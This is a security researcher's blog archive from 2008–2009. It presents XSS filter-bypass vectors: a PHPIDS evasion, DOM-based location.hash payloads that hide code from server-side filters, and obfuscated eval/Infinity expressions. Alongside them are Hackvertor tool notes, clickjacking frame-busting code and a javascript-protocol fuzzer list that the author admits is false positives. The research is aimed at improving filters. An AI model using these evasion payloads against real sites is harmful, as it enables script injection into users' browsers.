Skip to content

PHPIDS bypass

I haven’t hacked the PHPIDS for a while but David Lindsay (AKA Thornmaker) inspired me. When I say hacked I mean in a good way because finding bypasses helps improve the filters :)

Here is my vector:-

/Please submit the string\
to help us make the \
PHPIDS better./,y=('aler\
t'),x=this,x=x[y]
x('I cant let you have all the fun thornmaker'),/abc abc\
abc abc abc\
abc\
/,/abc abc\
abc abc abc\
abc\
/

Notice the English like text in order to bypass the centrifuge detection. I use backslashes to create strings in order to bypass the regular expressions. “this” refers to the current window and the string alert is passed to the window object which creates a reference to the alert function. It’s worth noting Mario fixed it very quickly so it no longer works. If you want a go and want to come up with your own vector then check out the phpids demo page.

Posted 04 January 2009 Gareth Heyes § Security § php § xss Comments (3)

Hackvertor video demo

I’ve finally created a Hackvertor video demo, I’ve encoded it in swf and compressed it quite a lot. The quality is good and at a high resolution but the colours are a bit out other than that it should be quite clear how it works. The demo is available here:-

Hackvertor video demo

Posted 18 December 2008 Gareth Heyes § Security § hackvertor § javascript § php Comments (3)

Location based XSS attacks

The basic attack

Using the hash portion of the location is a good way to beat filters, anything sent via the hash is not sent to the server in question. We can use a large amount of data which is hidden from the server side filters and combine it with data sent on the server. For example we can send:-

http://someserver.com/somepage.php?
param=",eval(location.hash.slice(1))//#alert(1)

Data sent to the server : 

",eval(location.hash.slice(1))//

Data only sent through the client : 

#alert(1)

“slice” simply selects the location.hash from the second character because the # is included and would raise a syntax error.

More advanced variation

There are times when server side filters will remove all instances of “(” or “)” or maybe a WAF will disallow such requests. That alone will not save you from these sort of attacks because there’s a trick you can use to defeat those filters.

Remember the server can only see the server side potion of the attack, we can combine both strings to produce our attack without “(” or “)”. For example:-

http://someserver.com/somepage.php?
param=",location='javascript:/*'+location.hash//#*/alert(1)

Data sent to the server : 

",location='javascript:/*'+location.hash//

Data sent to the client : 

#*/alert(1)

We start the comment in the server side request and complete it in the client side location.hash request. Location is assigned javascript:/*#*/alert(1) removing the need for the slice(1) as shown previously.

The attacks mentioned are DOM based XSS attacks and are actually more common than you think, they are just more difficult to find than regular XSS.

Posted 01 December 2008 Gareth Heyes § Cascading Style Sheets § Security § csrf § xss Comments (7)

IP conversion

I’ve been busy investigating URLs recently and I thought my Hackvertor tool had all ways of changing a IP covered. But after researching stuff over the weekend I found that it is lacking in certain areas. For example you can convert two octets to octal or hex and there wasn’t really a easy way of doing this with the current tags.

Decoding this stuff can also be useful especially if you are analysing malware and want a quick way to decode a few obscured IPs. The decoders detect if you are trying to decode full IP addresses or part of an IP.

The tags supported are ip2dword which converts a IP to a decimal number, it includes the ability to encode it a few times with the parameter. This is possible because the unused hex numbers are discarded by the application, examples of how to use this are available below. ip2hex and ip2oct allow you to encode a full or part of a IP address (the rightmost part) with hex or octal. Each tag has a alternative decode.

Examples

I’ll use Google’s IP as a example 216.239.59.99

First we can use ip2dword to convert it to decimal:-
dword conversion

It also supports a parameter which allows you to encode it a few more times:-
dword multiple

You can also encode part of the IP and the tags are clever enough to detect this automatically:-
dword part encode

Finally I’ll show you how to use the octal and hex encoding in full or part of a IP address, I’ve included a part decode example as well which decodes the last two octets of the IP:-
hex, octal and decoding

Posted 25 November 2008 Gareth Heyes § Security § hackvertor § javascript Comments (0)

Javascript vbscript challenge

Whilst hacking away in javascript I was experimenting with various things and I thought of a problem which would make a good challenge.

The idea was to produce some vbscript which executed the msgbox function without using parenthesis but the trick was not to raise a syntax error in javascript when parsing the code. I found a cool solution to this but lets see what you can come up with. Here are the main rules:-

Rules

1. No parenthesis may be used.
2. The vbscript version must execute msgbox with a argument of 1.
3. No syntax errors in either vbscript or jscript.
4. Errors can’t be turned off, using window.onerror for example is not allowed.
5. Both code samples must work in IE7.
6. The javascript and vbscript code should be identical.

In order to win the challenge you must provide the correct code which executes within the following tags:-

<script type="text/vbscript">
Your vbscript code here
</script>
 
<script type="text/javascript">
Your javascript code here
</script>
Posted 09 November 2008 Gareth Heyes § Security § fun § javascript Comments (9)

Hackvertor and clickjacking

Update

I’ve updated Hackvertor for the final time until the brand new version is ready. I thought I’d blog about it because it includes some interesting features from a security point of view.

HTML escape

The DOM inspector didn’t escape HTML when inspecting the DOM, this didn’t cause XSS because user interaction was need to actually execute the inspector but I fixed it anyway because I need to check some values when performing some javascript research.

Clickjacking protection

I’ve also added some Clickjacking/CSS Overlay/UI redressing/Insert Lame name here protection. It works by destroying the Hackvertor UI if it has been framed. I can do this because the vulnerability is that Hackvertor executes javascript and isn’t vulnerable to CSRF because there’s no server side action to perform :)

The code I’ve used is:-

if(top != self) {
   window.onload=function() {
     document.open();
     document.write('UI Redressing/Clickjacking/CSS Overlay/Latest Buzzword protection');
     document.close();
   }
}

Inspect output improvements

Finally I’ve updated the inspect output button. This button is really handy when you need to traverse a object quickly and find “hidden” properties or relationships with other objects. It works by evaluating the output entered and running a bruteforce check on the object for properties between -10000 and 10000 as well as single characters. Why do this? Because it exposes some interesting browser quirks in Firefox and maybe others, originally it was inspired by DoctorDan’s discovery on sla.ckers that the reg exp object in Firefox contains a hidden property.

The format now looks nice and I’ve added native js properties to help with js hacking and XSS research. A sample of how it works can be found here:-
http://tinyurl.com/5jodze

Posted 02 November 2008 Gareth Heyes § Security § hackvertor § javascript Comments (1)

Wordpress plugin security

It’s really bad. The amount of code that gets released and is vulnerable is shocking. Wordpress you need to do something. Anything. Disable all plugins now, run a audit on the code or use a user security review process, even as a last resort run some sort of automation on the code. Is it really that hard? Scan for common vulnerablities like echo PHP_SELF, global injections and so on.

I’ve just reviewed yet another security report from Blogsec and some more vulnerable plugins. You boast about all those users. Do something to help secure their software.

Posted 22 October 2008 Gareth Heyes § Security § Wordpress § php Comments (5)

Bluehat

It was awesome! My first conference and the first time I’ve ever spoken about security stuff. I was really nervous but after the first one I calmed down a bit. We presented a total of three times, two 30 minute slots and a final 50 minutes. It was a lot easier because there was three of us and we all shared the talk equally and it was pretty amazing that it worked because we only met in person when we got there.

The best part of the conference was meeting people with similar interests and talking about security stuff, I really enjoyed talking to Eduardo (Sirdarckcat), David Lindsay (Thornmaker), David Ross, Alex (Kuza55), Eric (Watch out for those banana men dude) and many more people.

Personally I think the best talk of the conference was about buffer overflow defenses in Windows (Mitigations Unplugged), I’m currently learning about these techniques and Matt did a great job of explaining every mitigation that Windows has. I can’t wait until I’m good enough to exploit these techniques :D

My part of the talk went well but I’ve just got to learn to slow down a bit and provide more explanation. Also turning the mic off when leaving the room would be a good idea :)

I went through my XSS vectors and I wanted to demo the creation of the final complex CSS expression vector but my Hackvertor tool wouldn’t fit on the damn screen :( I didn’t want to change the resolution in mid presentation. I might release a new video to the Bluehat site if I can get permission and if I actually record it. I then demoed my UTF-7 style sheet which is interesting, @charset at rule is not used much and I’m not sure if everyone knew it could be used to encode expressions :)

Finally I went through some CSS overlay (Click jacking) attacks and mitigation techniques. A browser level solution is needed here as all we’ve got currently is frame busters/breakers. If it was up to me I’d lock iframe/frame/object/applet styles and make them always visible but I can hear you designers shouting in the background.

Eduardo then described the best part of our talk IMO, the CSS attribute reader he came up with. It’s just plain awesome. When he described the technique to me via IM I thought it was cool but I couldn’t think of a viable attack situation however when meeting up he made it much clearer and we came up with a few good ideas on how it can be used in an attack.

David Lindsay then went through some more CSS hacking techniques, LAN scanning and history crawling. We then went on to demo our games and POC’s which was fun.

The last day I was invited to be on the WAF panel debate because someone dropped out, it was a great opportunity to express the real problem behind the countless amount of web sites with XSS and SQL injection holes. Nate and Mike really had some good views on the subject and I totally agreed with their opinion. We came to the conclusion that although a WAF can never be a perfect solution it does add some benefit however fix your code first and throw out the crappy books with examples like echo $_REQUEST['something'] in.

Before I forget my damn CSS paint application didn’t work :( Damn I should have simplified it for the presentation. Anyway here’s the fun demo:-
CSS paint

Other demos from our presentation are available here:-
Our demos

Last but not least the slides:-
the_sexy_assassin2ppt

Posted 20 October 2008 Gareth Heyes § Security § conferences Comments (1)

To infinity and beyond!

To infinity and beyond

I’m still heavily researching Javascript in search of XSS vectors and interesting syntax. I’ve found loads of cool stuff recently and while looking through the ECMA spec. I came across the Infinity object which is a global and a number, of course I was already aware of it but I thought what kind of interesting code can be constructed with it.

It turns out quite a lot, here’s a window.name vector. I’ve added the variable name to simulate and execute the code.

name = 'alert(1)'
-Infinity++in eval(1&&name)

This doesn’t look like it could work but does

+Infinity++in+alert(1)

And my final example combines a few different operators:-

1,0000instanceof delete~void--Infinity/~alert(1)

There are endless possiblities and I’ll leave you to play

Posted 01 October 2008 Gareth Heyes § Security § javascript § xss Comments (0)

Javascript protocol fuzzer and Opera

I’ve updated my protocol fuzzer with charset support (Thanks Chris Weber for the suggestion). I tried the various browsers with the fuzzer so far nothing in IE8 yet :( but I downloaded the latest Opera and found these :D

Update…

Opps I made a mistake, my fuzzer reported false positives because Opera reported the links correctly but when clicking them it doesn’t work. Previous versions did work using some of these entities so I’m thinking it’s something they’ve fixed but still major doh moment from me. Next time I’ll manually test the links rather than listening to my code :)


Char:2048,Link:javascriptࠀ:
Char:2304,Link:javascriptऀ:
Char:3840,Link:javascriptༀ:
Char:4096,Link:javascriptက:
Char:4256,Link:javascriptႠ:
Char:4352,Link:javascriptᄀ:
Char:4608,Link:javascriptሀ:
Char:4864,Link:javascriptጀ:

Char:5120,Link:javascript᐀:
Char:5376,Link:javascriptᔀ:
Char:5632,Link:javascriptᘀ:
Char:5888,Link:javascriptᜀ:
Char:6400,Link:javascriptᤀ:
Char:6656,Link:javascriptᨀ:
Char:7424,Link:javascriptᴀ:
Char:7936,Link:javascriptἀ:
Char:7944,Link:javascriptἈ:

Char:11520,Link:javascriptⴀ:
Char:12544,Link:javascript㄀:
Char:13312,Link:javascript㐀:
Char:13568,Link:javascript㔀:
Char:13824,Link:javascript㘀:
Char:14080,Link:javascript㜀:
Char:14336,Link:javascript㠀:
Char:14592,Link:javascript㤀:
Char:14848,Link:javascript㨀:

Char:15104,Link:javascript㬀:
Char:15360,Link:javascript㰀:
Char:15616,Link:javascript㴀:
Char:15872,Link:javascript㸀:
Char:16128,Link:javascript㼀:
Char:16384,Link:javascript䀀:
Char:16640,Link:javascript䄀:
Char:16896,Link:javascript䈀:
Char:17152,Link:javascript䌀:
Char:17408,Link:javascript䐀:
Char:17664,Link:javascript䔀:
Char:17920,Link:javascript䘀:
Char:18176,Link:javascript䜀:
Char:18432,Link:javascript䠀:
Char:18688,Link:javascript䤀:
Char:18944,Link:javascript䨀:
Char:19200,Link:javascript䬀:
Char:19456,Link:javascript䰀:
Char:19712,Link:javascript䴀:
Char:19968,Link:javascript一:

Char:20224,Link:javascript伀:
Char:20480,Link:javascript倀:
Char:20736,Link:javascript儀:
Char:20992,Link:javascript刀:
Char:21248,Link:javascript匀:
Char:21504,Link:javascript吀:
Char:21760,Link:javascript唀:
Char:22016,Link:javascript嘀:
Char:22272,Link:javascript圀:
Char:22528,Link:javascript堀:
Char:22784,Link:javascript夀:
Char:23040,Link:javascript娀:
Char:23296,Link:javascript嬀:
Char:23552,Link:javascript尀:
Char:23808,Link:javascript崀:
Char:24064,Link:javascript帀:
Char:24320,Link:javascript开:
Char:24576,Link:javascript怀:
Char:24832,Link:javascript愀:

Char:25088,Link:javascript戀:
Char:25344,Link:javascript挀:
Char:25600,Link:javascript搀:
Char:25856,Link:javascript攀:
Char:26112,Link:javascript昀:
Char:26368,Link:javascript最:
Char:26624,Link:javascript栀:
Char:26880,Link:javascript椀:
Char:27136,Link:javascript樀:
Char:27392,Link:javascript欀:
Char:27648,Link:javascript氀:
Char:27904,Link:javascript洀:
Char:28160,Link:javascript渀:
Char:28416,Link:javascript漀:
Char:28672,Link:javascript瀀:
Char:28928,Link:javascript焀:
Char:29184,Link:javascript爀:
Char:29440,Link:javascript猀:
Char:29696,Link:javascript琀:
Char:29952,Link:javascript甀:

Char:30208,Link:javascript瘀:
Char:30464,Link:javascript眀:
Char:30720,Link:javascript砀:
Char:30976,Link:javascript礀:
Char:31232,Link:javascript稀:
Char:31488,Link:javascript笀:
Char:31744,Link:javascript簀:
Char:32000,Link:javascript紀:
Char:32256,Link:javascript縀:
Char:32512,Link:javascript缀:
Char:32768,Link:javascript耀:
Char:33024,Link:javascript脀:
Char:33280,Link:javascript舀:
Char:33536,Link:javascript茀:
Char:33792,Link:javascript萀:
Char:34048,Link:javascript蔀:
Char:34304,Link:javascript蘀:
Char:34560,Link:javascript蜀:
Char:34816,Link:javascript蠀:

Char:35072,Link:javascript褀:
Char:35328,Link:javascript言:
Char:35584,Link:javascript謀:
Char:35840,Link:javascript谀:
Char:36096,Link:javascript贀:
Char:36352,Link:javascript踀:
Char:36608,Link:javascript輀:
Char:36864,Link:javascript退:
Char:37120,Link:javascript鄀:
Char:37376,Link:javascript鈀:
Char:37632,Link:javascript錀:
Char:37888,Link:javascript鐀:
Char:38144,Link:javascript销:
Char:38400,Link:javascript阀:
Char:38656,Link:javascript需:
Char:38912,Link:javascript頀:
Char:39168,Link:javascript餀:
Char:39424,Link:javascript騀:
Char:39680,Link:javascript鬀:
Char:39936,Link:javascript鰀:

Char:40192,Link:javascript鴀:
Char:40448,Link:javascript鸀:
Char:40704,Link:javascript鼀:
Char:40960,Link:javascriptꀀ:
Char:41216,Link:javascriptꄀ:
Char:41472,Link:javascriptꈀ:
Char:41728,Link:javascriptꌀ:
Char:41984,Link:javascriptꐀ:
Char:43008,Link:javascriptꠀ:
Char:44032,Link:javascript가:
Char:44288,Link:javascript관:
Char:44544,Link:javascript글:
Char:44800,Link:javascript꼀:

Char:45056,Link:javascript뀀:
Char:45312,Link:javascript넀:
Char:45568,Link:javascript눀:
Char:45824,Link:javascript대:
Char:46080,Link:javascript됀:
Char:46336,Link:javascript딀:
Char:46592,Link:javascript똀:
Char:46848,Link:javascript뜀:
Char:47104,Link:javascript렀:
Char:47360,Link:javascript뤀:
Char:47616,Link:javascript먀:
Char:47872,Link:javascript묀:
Char:48128,Link:javascript밀:
Char:48384,Link:javascript봀:
Char:48640,Link:javascript븀:
Char:48896,Link:javascript뼀:
Char:49152,Link:javascript쀀:
Char:49408,Link:javascript섀:
Char:49664,Link:javascript숀:
Char:49920,Link:javascript쌀:

Char:50176,Link:javascript쐀:
Char:50432,Link:javascript씀:
Char:50688,Link:javascript였:
Char:50944,Link:javascript윀:
Char:51200,Link:javascript저:
Char:51456,Link:javascript준:
Char:51712,Link:javascript쨀:
Char:51968,Link:javascript쬀:
Char:52224,Link:javascript찀:
Char:52480,Link:javascript촀:
Char:52736,Link:javascript츀:
Char:52992,Link:javascript케:
Char:53248,Link:javascript퀀:
Char:53504,Link:javascript턀:
Char:53760,Link:javascript툀:
Char:54016,Link:javascript팀:
Char:54272,Link:javascript퐀:
Char:54528,Link:javascript픀:
Char:54784,Link:javascript혀:

Char:55040,Link:javascript휀:

Posted 18 September 2008 Gareth Heyes § Cascading Style Sheets § Security § javascript Comments (2)